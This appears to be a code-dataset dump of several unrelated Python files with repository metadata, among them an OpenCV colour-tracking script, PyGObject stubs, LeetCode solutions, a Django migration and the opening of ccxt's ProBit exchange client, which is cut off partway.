return self.state_, reward, episode_end, {'probs':probs, 'random_num':random_num}
if __name__=="__main__":
rows = 5
cols = 5
R_max = 10.0
noise = 0.3
env = Gridworld(rows, cols, R_max, noise)
print "env.n_state : ", env.n_state
print "env.n_action : ", env.n_action
max_episode = 1000
max_step = 200
# reward_map = np.load('./reward_map.npy')
# print "reward_map : "
# print reward_map
reward_map = np.zeros([rows, cols])
reward_map[rows-1, cols-1] = R_max
for i in xrange(max_episode):
print "================================================="
print "episode : ", i+1
observation = env.reset()
for j in xrange(max_step):
print "---------------------------------------------"
state = observation
print "state : ", state
action = np.random.randint(env.n_action)
print "action : ", action, env.dirs[action]
# observation, reward, done, info = env.step(action)
observation, reward, done, info = env.step(action, reward_map)
next_state = observation
print "next_state : ", next_state
print "reward : ", reward
print "episode_end : ", done
# print "info : ", info
print "step : ", j+1
if done:
break
| [
"[email protected]"
] | |
6c8ac1427f142513c13bd7794b07ab96a6f4c884 | 751cf52d62dba7d88387fc5734d6ee3954054fc2 | /opencv/experiments_raw/contourExperiments/contourExperiment.py | 25321959930231caf2a2607e82fe2c8687768cfe | [
"MIT"
] | permissive | nooralight/lab-computer-vision | 70a4d84a47a14dc8f5e9796ff6ccb59d4451ff27 | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | refs/heads/master | 2023-03-17T12:45:22.700237 | 2017-07-11T22:17:09 | 2017-07-11T22:17:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,364 | py | """
Display three views:
original frame
mask
resultant frame
whenever user clicks in original frame, color is specified
this color becomes the new mask color
The system then creates a contour around the largest object of that color on the screen, and a crosshair follows after that object
"""
import cv2
import numpy as np
color = np.array([0,0,0])
# CRAN = 20
# CRanArr = np.array([20, 10, 10])
# try (0, 50, 10)
def findHSV(bgr):
"convert BGR array to HSV"
bgr = np.uint8([[bgr]])
hsv = cv2.cvtColor(bgr, cv2.COLOR_BGR2HSV)
return hsv
def drawXHair(img, y, x):
# 20 pt radius
color = (0,0,255)
# color = tuple(col[0][0])
# print type(col)
# print(col)
radius = 20
thickn = 2
cv2.circle(img, (int(x), int(y)), 20, color, thickn)
cv2.line(img, (x-radius, y), (x+radius, y), color, thickn)
cv2.line(img, (x, y-radius), (x, y+radius), color, thickn)
def colorSelect(event, x, y, flags, param):
global color
if event == cv2.EVENT_LBUTTONUP:
color_rgb = frame[y, x, 0:3]
color = findHSV(color_rgb)
print(color)
def doNothing(x):
pass
cap = cv2.VideoCapture(0)
cv2.namedWindow('frame')
cv2.setMouseCallback('frame', colorSelect)
cv2.namedWindow('trackbars')
cv2.createTrackbar('H', 'trackbars', 0, 50, doNothing)
cv2.createTrackbar('S', 'trackbars', 50, 50, doNothing)
cv2.createTrackbar('V', 'trackbars', 10, 50, doNothing)
while(1):
dh = cv2.getTrackbarPos('H', 'trackbars')
ds = cv2.getTrackbarPos('S', 'trackbars')
dv = cv2.getTrackbarPos('V', 'trackbars')
CRanArr = np.array([dh, ds, dv])
# take each frame
_, frame = cap.read()
print(np.shape(frame))
# convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# define range of blue color in HSV
# lower_color = color + np.array([-CRAN, -CRAN, -CRAN])
# upper_color = color + np.array([CRAN, CRAN, CRAN])
lower_color = color - CRanArr
upper_color = color + CRanArr
# print lower_color , '|' , upper_color
# threshold the HSV image to get only blue colors
mask = cv2.inRange(hsv, lower_color, upper_color)
# Noise removal experimentation
kernel = np.ones((20,20), np.uint8)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
# mask = cv2.erode(mask, kernel, iterations = 1)
# mask = cv2.dilate(mask, kernel, iterations=5)
ret, thresh = cv2.threshold(mask, 127, 255, 0)
im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(mask, contours, -1, 150, 3)
area = 0
largest_contour = 0
for i in xrange(len(contours)):
if cv2.contourArea(contours[i])>area:
largest_contour = i
cv2.drawContours(mask, contours, largest_contour, 150, 3)
print len(contours)
if len(contours)>0:
M = cv2.moments(contours[largest_contour])
if M['m00']>0:
cx = int(M['m10']/(M['m00']))
cy = int(M['m01']/(M['m00']))
print cx ,'|', cy
drawXHair(frame, cy, cx)
print(color)
# bitwise-AND mask and original image
res = cv2.bitwise_and(frame, frame, mask= mask)
cv2.imshow('frame', frame)
cv2.imshow('mask', mask)
cv2.imshow('res', res)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
76c88c378f30434c23ff53230551d62966e81f4c | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Dazzle/SettingsSandwich.py | 4bf884a1566ec11046ea8ac3aff429377d644bff | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 18,357 | py | # encoding: utf-8
# module gi.repository.Dazzle
# from /usr/lib64/girepository-1.0/Dazzle-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.Gio as __gi_overrides_Gio
import gi.overrides.GObject as __gi_overrides_GObject
import gi.overrides.Gtk as __gi_overrides_Gtk
import gi.repository.Gio as __gi_repository_Gio
import gi.repository.GObject as __gi_repository_GObject
import gi.repository.Gtk as __gi_repository_Gtk
import gobject as __gobject
class SettingsSandwich(__gi_overrides_GObject.Object):
"""
:Constructors:
::
SettingsSandwich(**properties)
new(schema_id:str, path:str) -> Dazzle.SettingsSandwich
"""
def append(self, settings): # real signature unknown; restored from __doc__
""" append(self, settings:Gio.Settings) """
pass
def bind(self, key, p_object=None, property, flags): # real signature unknown; restored from __doc__
""" bind(self, key:str, object=None, property:str, flags:Gio.SettingsBindFlags) """
pass
def bind_property(self, *args, **kwargs): # real signature unknown
pass
def bind_property_full(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def bind_with_mapping(self, key, p_object=None, property, flags, get_mapping, set_mapping, user_data=None): # real signature unknown; restored from __doc__
""" bind_with_mapping(self, key:str, object=None, property:str, flags:Gio.SettingsBindFlags, get_mapping:Gio.SettingsBindGetMapping, set_mapping:Gio.SettingsBindSetMapping, user_data=None) """
pass
def chain(self, *args, **kwargs): # real signature unknown
pass
def compat_control(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def connect(self, *args, **kwargs): # real signature unknown
pass
def connect_after(self, *args, **kwargs): # real signature unknown
pass
def connect_data(self, detailed_signal, handler, *data, **kwargs): # reliably restored by inspect
"""
Connect a callback to the given signal with optional user data.
:param str detailed_signal:
A detailed signal to connect to.
:param callable handler:
Callback handler to connect to the signal.
:param *data:
Variable data which is passed through to the signal handler.
:param GObject.ConnectFlags connect_flags:
Flags used for connection options.
:returns:
A signal id which can be used with disconnect.
"""
pass
def connect_object(self, *args, **kwargs): # real signature unknown
pass
def connect_object_after(self, *args, **kwargs): # real signature unknown
pass
def disconnect(*args, **kwargs): # reliably restored by inspect
""" signal_handler_disconnect(instance:GObject.Object, handler_id:int) """
pass
def disconnect_by_func(self, *args, **kwargs): # real signature unknown
pass
def emit(self, *args, **kwargs): # real signature unknown
pass
def emit_stop_by_name(self, detailed_signal): # reliably restored by inspect
""" Deprecated, please use stop_emission_by_name. """
pass
def find_property(self, property_name): # real signature unknown; restored from __doc__
""" find_property(self, property_name:str) -> GObject.ParamSpec """
pass
def force_floating(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def freeze_notify(self): # reliably restored by inspect
"""
Freezes the object's property-changed notification queue.
:returns:
A context manager which optionally can be used to
automatically thaw notifications.
This will freeze the object so that "notify" signals are blocked until
the thaw_notify() method is called.
.. code-block:: python
with obj.freeze_notify():
pass
"""
pass
def getv(self, names, values): # real signature unknown; restored from __doc__
""" getv(self, names:list, values:list) """
pass
def get_boolean(self, key): # real signature unknown; restored from __doc__
""" get_boolean(self, key:str) -> bool """
return False
def get_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def get_default_value(self, key): # real signature unknown; restored from __doc__
""" get_default_value(self, key:str) -> GLib.Variant """
pass
def get_double(self, key): # real signature unknown; restored from __doc__
""" get_double(self, key:str) -> float """
return 0.0
def get_int(self, key): # real signature unknown; restored from __doc__
""" get_int(self, key:str) -> int """
return 0
def get_properties(self, *args, **kwargs): # real signature unknown
pass
def get_property(self, *args, **kwargs): # real signature unknown
pass
def get_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def get_string(self, key): # real signature unknown; restored from __doc__
""" get_string(self, key:str) -> str """
return ""
def get_uint(self, key): # real signature unknown; restored from __doc__
""" get_uint(self, key:str) -> int """
return 0
def get_user_value(self, key): # real signature unknown; restored from __doc__
""" get_user_value(self, key:str) -> GLib.Variant """
pass
def get_value(self, key): # real signature unknown; restored from __doc__
""" get_value(self, key:str) -> GLib.Variant """
pass
def handler_block(obj, handler_id): # reliably restored by inspect
"""
Blocks the signal handler from being invoked until
handler_unblock() is called.
:param GObject.Object obj:
Object instance to block handlers for.
:param int handler_id:
Id of signal to block.
:returns:
A context manager which optionally can be used to
automatically unblock the handler:
.. code-block:: python
with GObject.signal_handler_block(obj, id):
pass
"""
pass
def handler_block_by_func(self, *args, **kwargs): # real signature unknown
pass
def handler_disconnect(*args, **kwargs): # reliably restored by inspect
""" signal_handler_disconnect(instance:GObject.Object, handler_id:int) """
pass
def handler_is_connected(*args, **kwargs): # reliably restored by inspect
""" signal_handler_is_connected(instance:GObject.Object, handler_id:int) -> bool """
pass
def handler_unblock(*args, **kwargs): # reliably restored by inspect
""" signal_handler_unblock(instance:GObject.Object, handler_id:int) """
pass
def handler_unblock_by_func(self, *args, **kwargs): # real signature unknown
pass
def install_properties(self, pspecs): # real signature unknown; restored from __doc__
""" install_properties(self, pspecs:list) """
pass
def install_property(self, property_id, pspec): # real signature unknown; restored from __doc__
""" install_property(self, property_id:int, pspec:GObject.ParamSpec) """
pass
def interface_find_property(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def interface_install_property(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def interface_list_properties(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def is_floating(self): # real signature unknown; restored from __doc__
""" is_floating(self) -> bool """
return False
def list_properties(self): # real signature unknown; restored from __doc__
""" list_properties(self) -> list, n_properties:int """
return []
def new(self, schema_id, path): # real signature unknown; restored from __doc__
""" new(schema_id:str, path:str) -> Dazzle.SettingsSandwich """
pass
def newv(self, object_type, parameters): # real signature unknown; restored from __doc__
""" newv(object_type:GType, parameters:list) -> GObject.Object """
pass
def notify(self, property_name): # real signature unknown; restored from __doc__
""" notify(self, property_name:str) """
pass
def notify_by_pspec(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def override_property(self, property_id, name): # real signature unknown; restored from __doc__
""" override_property(self, property_id:int, name:str) """
pass
def ref(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def ref_sink(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def replace_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def replace_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def run_dispose(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def set_boolean(self, key, val): # real signature unknown; restored from __doc__
""" set_boolean(self, key:str, val:bool) """
pass
def set_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def set_double(self, key, val): # real signature unknown; restored from __doc__
""" set_double(self, key:str, val:float) """
pass
def set_int(self, key, val): # real signature unknown; restored from __doc__
""" set_int(self, key:str, val:int) """
pass
def set_properties(self, *args, **kwargs): # real signature unknown
pass
def set_property(self, *args, **kwargs): # real signature unknown
pass
def set_string(self, key, val): # real signature unknown; restored from __doc__
""" set_string(self, key:str, val:str) """
pass
def set_uint(self, key, val): # real signature unknown; restored from __doc__
""" set_uint(self, key:str, val:int) """
pass
def set_value(self, key, value): # real signature unknown; restored from __doc__
""" set_value(self, key:str, value:GLib.Variant) """
pass
def steal_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def steal_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def stop_emission(self, detailed_signal): # reliably restored by inspect
""" Deprecated, please use stop_emission_by_name. """
pass
def stop_emission_by_name(*args, **kwargs): # reliably restored by inspect
""" signal_stop_emission_by_name(instance:GObject.Object, detailed_signal:str) """
pass
def thaw_notify(self): # real signature unknown; restored from __doc__
""" thaw_notify(self) """
pass
def unbind(self, property): # real signature unknown; restored from __doc__
""" unbind(self, property:str) """
pass
def unref(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def watch_closure(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def weak_ref(self, *args, **kwargs): # real signature unknown
pass
def _force_floating(self, *args, **kwargs): # real signature unknown
""" force_floating(self) """
pass
def _ref(self, *args, **kwargs): # real signature unknown
""" ref(self) -> GObject.Object """
pass
def _ref_sink(self, *args, **kwargs): # real signature unknown
""" ref_sink(self) -> GObject.Object """
pass
def _unref(self, *args, **kwargs): # real signature unknown
""" unref(self) """
pass
def _unsupported_data_method(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def _unsupported_method(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __deepcopy__(self, *args, **kwargs): # real signature unknown
pass
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, **properties): # real signature unknown; restored from __doc__
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
g_type_instance = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
qdata = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
ref_count = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__gpointer__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__grefcount__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
props = None # (!) real value is '<gi._gi.GProps object at 0x7f3b25efe460>'
__class__ = None # (!) real value is "<class 'gi.types.GObjectMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': ObjectInfo(SettingsSandwich), '__module__': 'gi.repository.Dazzle', '__gtype__': <GType DzlSettingsSandwich (93962411670528)>, '__doc__': None, '__gsignals__': {}, 'new': gi.FunctionInfo(new), 'append': gi.FunctionInfo(append), 'bind': gi.FunctionInfo(bind), 'bind_with_mapping': gi.FunctionInfo(bind_with_mapping), 'get_boolean': gi.FunctionInfo(get_boolean), 'get_default_value': gi.FunctionInfo(get_default_value), 'get_double': gi.FunctionInfo(get_double), 'get_int': gi.FunctionInfo(get_int), 'get_string': gi.FunctionInfo(get_string), 'get_uint': gi.FunctionInfo(get_uint), 'get_user_value': gi.FunctionInfo(get_user_value), 'get_value': gi.FunctionInfo(get_value), 'set_boolean': gi.FunctionInfo(set_boolean), 'set_double': gi.FunctionInfo(set_double), 'set_int': gi.FunctionInfo(set_int), 'set_string': gi.FunctionInfo(set_string), 'set_uint': gi.FunctionInfo(set_uint), 'set_value': gi.FunctionInfo(set_value), 'unbind': gi.FunctionInfo(unbind)})"
__gdoc__ = 'Object DzlSettingsSandwich\n\nProperties from DzlSettingsSandwich:\n path -> gchararray: Settings Path\n Settings Path\n schema-id -> gchararray: Schema Id\n Schema Id\n\nSignals from GObject:\n notify (GParam)\n\n'
__gsignals__ = {}
__gtype__ = None # (!) real value is '<GType DzlSettingsSandwich (93962411670528)>'
__info__ = ObjectInfo(SettingsSandwich)
| [
"[email protected]"
] | |
8dc31ef220e3a12803bb906e33892e6ea9a93a18 | b00873d36e44128ce30623da0ee3b556e4e3d7e7 | /solutions/solution725.py | 534be36c9402b8115b72bfe0c67a417dff55304b | [
"MIT"
] | permissive | Satily/leetcode_python_solution | b4aadfd1998877b5086b5423c670750bb422b2c8 | 3f05fff7758d650469862bc28df9e4aa7b1d3203 | refs/heads/master | 2021-07-18T07:53:10.387182 | 2021-07-17T06:30:09 | 2021-07-17T06:30:09 | 155,074,789 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from data_structure import ListNode, build_link_list, flatten_link_list
class Solution:
def splitListToParts(self, root, k):
"""
:type root: ListNode
:type k: int
:rtype: List[ListNode]
"""
def split(h, lh):
if h is not None:
p = h
for _ in range(lh - 1):
p = p.next
q = p.next
p.next = None
return q, h
else:
return None, None
lr, p = 0, root
while p is not None:
p, lr = p.next, lr + 1
n, r = lr // k, lr % k
result = []
for i in range(k):
l = n
if i < r:
l += 1
root, head = split(root, l)
result.append(head)
return result
if __name__ == "__main__":
inputs = [
# ([1, 2, 3], 5),
([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 3),
]
for root_list, k in inputs:
root = build_link_list(root_list)
result = [flatten_link_list(head) for head in Solution().splitListToParts(root, k)]
print(result)
| [
"[email protected]"
] | |
c3784b117e770c6c6948e80849e5bd8cf0457254 | 7727187a009e4b9c46c2fe06609372ec8814cd23 | /test/test_augment_data.py | d83bec586121132d679dc61a95c78929cece6eea | [] | no_license | govtmirror/freemix-akara | ebf204554f4effc0543e60083698f2ea012413b8 | 1d10c3f02afbd4268852e2c52afdf77809176bdd | refs/heads/master | 2021-01-12T07:47:08.183429 | 2014-06-05T18:53:56 | 2014-06-05T18:53:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | import os
import urllib, urllib2
from urllib2 import urlopen
from freemix_akara import __version__
from server_support import server
RESOURCE_DIR = os.path.join(os.path.dirname(__file__), "resource")
def test_augment():
import simplejson
url = server() + "augment.freemix.json"
req = urllib2.Request(url)
data = open(os.path.join(RESOURCE_DIR, "augment", "augment_test1.js")).read()
response = urllib2.urlopen(req, data)
results = simplejson.load(response)
assert "items" in results
def test_mix():
import simplejson
url = server() + "mix.freemix.json"
req = urllib2.Request(url)
data = open(os.path.join(RESOURCE_DIR, "mix", "mix.js")).read()
response = urllib2.urlopen(req, data)
results = simplejson.load(response)
assert "items" in results
| [
"[email protected]"
] | |
f1f4be0600c0a96312d2b00339681c2c5efff41b | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_cackles.py | b56545b1c6dceb5e279e87bc0ba44c4f57263de2 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py |
#calss header
class _CACKLES():
def __init__(self,):
self.name = "CACKLES"
self.definitions = cackle
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['cackle']
| [
"[email protected]"
] | |
0f7ddbc55809f101e6c51e745fc682ec6439b74a | edbf8601ae771031ad8ab27b19c2bf450ca7df76 | /283-Move-Zeroes/MoveZeroes.py | b7e24b42230eae378975aceeeb96569feb6628fa | [] | no_license | gxwangdi/Leetcode | ec619fba272a29ebf8b8c7f0038aefd747ccf44a | 29c4c703d18c6ff2e16b9f912210399be427c1e8 | refs/heads/master | 2022-07-02T22:08:32.556252 | 2022-06-21T16:58:28 | 2022-06-21T16:58:28 | 54,813,467 | 3 | 2 | null | 2022-06-21T16:58:29 | 2016-03-27T05:02:36 | Java | UTF-8 | Python | false | false | 548 | py | class Solution(object):
def moveZeroes(self, nums):
"""
:type nums: List[int]
:rtype: None Do not return anything, modify nums in-place instead.
"""
if not nums or len(nums)<2:
return
slow=0
fast=0
size=len(nums)
while fast < size:
if nums[fast]==0:
fast+=1
continue
nums[slow] = nums[fast]
slow+=1
fast+=1
while slow < size:
nums[slow] =0
slow+=1
| [
"[email protected]"
] | |
f8ba0392696152c9b0153c42e7340ebb511a2e0a | 32bfc07c9661b0820e525158ef9a03c1d3256ecd | /Week 2/mysite-link1/django-polls/polls/migrations/0001_initial.py | 8f55db1363fc94de11712f49c0f9b7f97cca9bdc | [] | no_license | Aktoty00/BFDjango | c4d42d0f8d11a14813dbf2d67830531193b81417 | 95e28e9c56b1c1a3a286a1919b942512efdd585a | refs/heads/master | 2021-09-25T15:35:16.722971 | 2020-04-19T11:43:27 | 2020-04-19T11:43:27 | 234,919,812 | 0 | 0 | null | 2021-09-22T18:39:00 | 2020-01-19T15:16:34 | Python | UTF-8 | Python | false | false | 1,178 | py | # Generated by Django 2.1.7 on 2020-01-22 15:19
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.CharField(max_length=200)),
('votes', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question_text', models.CharField(max_length=200)),
('pub_date', models.DateTimeField(verbose_name='date published')),
],
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django-polls.polls.Question'),
),
]
| [
"[email protected]"
] | |
a789ad6f90b611c1ab8c53baa204e144607c2690 | e7dfccc8136776443461b6580752c7f0f50556b3 | /matrix_webhook/__main__.py | 18d4fccae9584210927760e0ca5fa6e165449fa1 | [
"BSD-2-Clause"
] | permissive | nim65s/matrix-webhook | f223e404922860dfae711b3017664b976fd9d4e2 | ad74f632c630a748577ba201c5e89dfa02eece4d | refs/heads/master | 2023-09-01T01:02:28.097429 | 2023-08-01T11:09:14 | 2023-08-01T11:09:14 | 171,114,171 | 97 | 32 | NOASSERTION | 2023-09-06T13:53:04 | 2019-02-17T11:29:31 | Python | UTF-8 | Python | false | false | 334 | py | """Matrix Webhook module entrypoint."""
import logging
from . import app, conf
def main():
"""Start everything."""
log_format = "%(asctime)s - %(name)s - %(lineno)d - %(levelname)s - %(message)s"
logging.basicConfig(level=50 - 10 * conf.VERBOSE, format=log_format)
app.run()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
15c83f62c9fd56c469799186fc20478de46552d4 | 054eefaa17157b32869ea986347b3e539d2bf06b | /big_o_coding/Blue_13/Homework/day_12_eko_spoj.py | 23dcd5c8db290cfe538fb92b5da5ca59e51c778e | [] | no_license | baocogn/self-learning | f2cb2f45f05575b6d195fc3c407daf4edcfe7d0e | f50a3946966354c793cac6b28d09cb5dba2ec57a | refs/heads/master | 2021-07-12T23:32:14.728163 | 2019-02-10T14:24:46 | 2019-02-10T14:24:46 | 143,170,276 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | import sys
input = sys.stdin.readline
N, M = map(int, input().split())
heights = list(map(int, input().split()))
def getCutted(height):
return sum(max(0, h - height) for h in heights)
left = 0
right = max(heights)
res = 0
while (left <= right):
mid = left + (right - left) // 2
if getCutted(mid) >= M:
res = mid
left = mid + 1
else:
right = mid - 1
print(res) | [
"[email protected]"
] | |
064bb76c7c62f304ae205b982893d13f9243fac9 | 1c4110a0bdbb888fd7a82579810cda2c73b52dba | /20210715 Pycharm/Pycharm/venv/Lib/site-packages/bamboo/common/colours.py | 389df001c9cd8b21e7310bebdda8bb08960fbeee | [] | no_license | DrillND/python | d09786e2937a10c9c67170826131b8ee204e0b37 | f6aa1d4d29e4519f89a63af4c3c8f83ed60630ea | refs/heads/main | 2023-06-19T11:51:14.307597 | 2021-07-16T07:18:52 | 2021-07-16T07:18:52 | 355,095,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py |
class bcolours:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
| [
"[email protected]"
] | |
caae4574f3a9d4ee99d07f1fe8a8fa13f4a68803 | dea56c4d044a55ccbbc63224e99cdf5c0a37fd8a | /python/ccxt/probit.py | 3fa95319921ee39c8030da45e246abf27193cb2a | [
"MIT"
] | permissive | Biboxcom/ccxt | ece93a53e6dc3b402f068a5aa39bbf9a47b88e47 | a82a15718aa2fe430dbc09fe10cc99575e5d2b35 | refs/heads/master | 2023-04-12T12:56:25.782008 | 2020-12-24T00:08:07 | 2020-12-24T00:08:07 | 324,118,781 | 2 | 0 | MIT | 2023-03-21T09:05:59 | 2020-12-24T09:31:56 | null | UTF-8 | Python | false | false | 48,425 | py | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import BadResponse
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidAddress
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import DDoSProtection
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import ExchangeNotAvailable
from ccxt.base.decimal_to_precision import TRUNCATE
from ccxt.base.decimal_to_precision import TICK_SIZE
class probit(Exchange):
def describe(self):
return self.deep_extend(super(probit, self).describe(), {
'id': 'probit',
'name': 'ProBit',
'countries': ['SC', 'KR'], # Seychelles, South Korea
'rateLimit': 250, # ms
'has': {
'CORS': True,
'fetchTime': True,
'fetchMarkets': True,
'fetchCurrencies': True,
'fetchTickers': True,
'fetchTicker': True,
'fetchOHLCV': True,
'fetchOrderBook': True,
'fetchTrades': True,
'fetchBalance': True,
'createOrder': True,
'createMarketOrder': True,
'cancelOrder': True,
'fetchOrder': True,
'fetchOpenOrders': True,
'fetchClosedOrders': True,
'fetchMyTrades': True,
'fetchDepositAddress': True,
'withdraw': True,
'signIn': True,
},
'timeframes': {
'1m': '1m',
'3m': '3m',
'5m': '5m',
'10m': '10m',
'15m': '15m',
'30m': '30m',
'1h': '1h',
'4h': '4h',
'6h': '6h',
'12h': '12h',
'1d': '1D',
'1w': '1W',
'1M': '1M',
},
'version': 'v1',
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/79268032-c4379480-7ea2-11ea-80b3-dd96bb29fd0d.jpg',
'api': {
'accounts': 'https://accounts.probit.com',
'public': 'https://api.probit.com/api/exchange',
'private': 'https://api.probit.com/api/exchange',
},
'www': 'https://www.probit.com',
'doc': [
'https://docs-en.probit.com',
'https://docs-ko.probit.com',
],
'fees': 'https://support.probit.com/hc/en-us/articles/360020968611-Trading-Fees',
'referral': 'https://www.probit.com/r/34608773',
},
'api': {
'public': {
'get': [
'market',
'currency',
'currency_with_platform',
'time',
'ticker',
'order_book',
'trade',
'candle',
],
},
'private': {
'post': [
'new_order',
'cancel_order',
'withdrawal',
],
'get': [
'balance',
'order',
'open_order',
'order_history',
'trade_history',
'deposit_address',
],
},
'accounts': {
'post': [
'token',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.2 / 100,
'taker': 0.2 / 100,
},
},
'exceptions': {
'exact': {
'UNAUTHORIZED': AuthenticationError,
'INVALID_ARGUMENT': BadRequest, # Parameters are not a valid format, parameters are empty, or out of range, or a parameter was sent when not required.
'TRADING_UNAVAILABLE': ExchangeNotAvailable,
'NOT_ENOUGH_BALANCE': InsufficientFunds,
